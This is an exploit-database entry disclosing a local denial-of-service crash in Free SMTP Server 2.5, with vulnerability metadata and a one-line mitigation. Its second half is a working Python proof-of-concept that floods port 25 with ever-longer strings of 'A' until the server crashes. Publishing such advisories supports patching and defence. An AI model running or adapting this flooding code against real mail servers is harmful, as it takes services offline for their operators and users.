Vendor: Free SMTP Server
By: Metin Kandemir (kandemir)
CVSS: 7.5 HIGH
Denial of Service
CWE: 400
Product Name: Free SMTP Server
Affected Version From: 2.5
Affected Version To: 2.5
Patch Exists: YES
Related CWE: N/A
CPE: //a:free_smtp_server:2.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 Service Pack 1 x64
2009

Free SMTP Server – Local Denial of Service Crash (PoC)

The SMTP server crashes when the proof-of-concept code is run on localhost. The code builds a list of strings of increasing length and sends each one to the server over a new connection to port 25, causing it to crash.

Mitigation:

Ensure that the SMTP server is running the latest version of the software and that all security patches are applied.

Exploit-DB raw data:

# Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC)
# Date: February 3, 2009
# Exploit Author: Metin Kandemir (kandemir)
# Vendor Homepage: http://www.softstack.com/freesmtp.html
# Software Link: https://free-smtp-server.en.uptodown.com/windows/download
# Version: 2.5
# Tested on: Windows 7 Service Pack 1 x64
# Software Description: Free SMTP server program to send emails directly from PC.
# ==================================================================
# The SMTP Server will crash when this code is run on localhost. 

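import socket

# Build payloads of increasing length: "A", "AA", ... up to 20001 characters.
# Written for Python 2, where socket.send() accepts a str.
a = 1
buffer = ["A"]
while a <= 20000:
    a = a + 1
    buffer.append("A" * a)

# Open a new connection to the local SMTP port for each payload and send it.
for string in buffer:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect(('127.0.0.1', 25))
    s.send(string)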